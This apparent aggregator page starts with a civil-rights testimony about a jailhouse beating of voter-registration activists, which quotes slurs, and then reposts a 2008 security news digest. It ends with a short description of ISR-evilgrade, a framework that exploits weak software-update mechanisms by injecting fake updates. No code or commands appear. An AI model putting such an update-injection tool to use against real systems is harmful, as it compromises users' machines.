I was carried to the county jail and put in the booking room. They left some of the people in the booking room and began to place us in cells. I was placed in a cell with a young woman called Miss Ivesta Simpson. After I was placed in the cell I began to hear sounds of licks and screams, I could hear the sounds of licks and horrible screams. And I could hear somebody say, "Can you say, 'yes, sir,' nigger? Can you say 'yes, sir'?"

And they would say other horrible names.

She would say, "Yes, I can say 'yes, sir.'"

"So, well, say it."

She said, "I don't know you well enough."

They beat her, I don't know how long. And after a while she began to pray, and asked God to have mercy on those people.

And it wasn't too long before three white men came to my cell. One of these men was a State Highway Patrolman and he asked me where I was from. I told him Ruleville and he said, "We are going to check this."

They left my cell and it wasn't too long before they came back. He said, "You are from Ruleville all right," and he used a curse word. And he said, "We are going to make you wish you was dead."

I was carried out of that cell into another cell where they had two Negro prisoners. The State Highway Patrolmen ordered the first Negro to take the blackjack.

The first Negro prisoner ordered me, by orders from the State Highway Patrolman, for me to lay down on a bunk bed on my face.

I laid on my face and the first Negro began to beat. I was beat by the first Negro until he was exhausted. I was holding my hands behind me at that time on my left side, because I suffered from polio when I was six years old.

After the first Negro had beat until he was exhausted, the State Highway Patrolman ordered the second Negro to take the blackjack.

The second Negro began to beat and I began to work my feet, and the State Highway Patrolman ordered the first Negro who had beat me to sit on my feet - to keep me from working my feet. I began to scream and one white man got up and began to beat me in my head and tell me to hush.

One white man - my dress had worked up high - he walked over and pulled my dress - I pulled my dress down and he pulled my dress back up.

I was in jail when Medgar Evers was murdered.

All of this is on account of we want to register, to become first-class citizens. And if the Freedom Democratic Party is not seated now, I question America. Is this America, the land of the free and the home of the brave, where we have to sleep with our telephones off the hooks because our lives be threatened daily, because we want to live as decent human beings, in America?

Thank you.

Security Briefing: August 29th [Liquidmatrix Security Digest]

Posted: 29 Aug 2008 07:35 AM CDT

newspapera.jpg

Ah, Friday before a long weekend. So happy that the weekend is here. And yet, I find myself looking forward to Tuesday. A new(ish) project that I’ve been working on may finally be coming to fruition. Fun and games. At any rate I hope everyone has a great weekend!

Click here to subscribe to Liquidmatrix Security Digest!.

And now, the news…

  1. Bank of NY Mellon says data breach now affects 12M | CNN
  2. Database of children is delayed | BBC News
  3. IDs of 13,000 retired officers exposed | Dayton Daily News
  4. Microsoft Updates IE Patch Due to VML Flaw | Redmond
  5. British computer hacker faces extradition to US after court appeal fails | The Guardian
  6. Best Western Security Breach Hack Fright Turns Murkier | Security Pro Portal
  7. BackTrack Version 3 is here | Search Security
  8. Reformed hacker Kevin Mitnick on his tell-all book | CBC

Tags: , , , ,

ISR-evilgrade - Inject Updates to Exploit Software [Darknet - The Darkside]

Posted: 29 Aug 2008 05:55 AM CDT

ISR-evilgrade is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates and exploiting the system or software. How does it work? It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems. Evilgrade needs the manipulation of...

Read the full post at darknet.org.uk

No comments: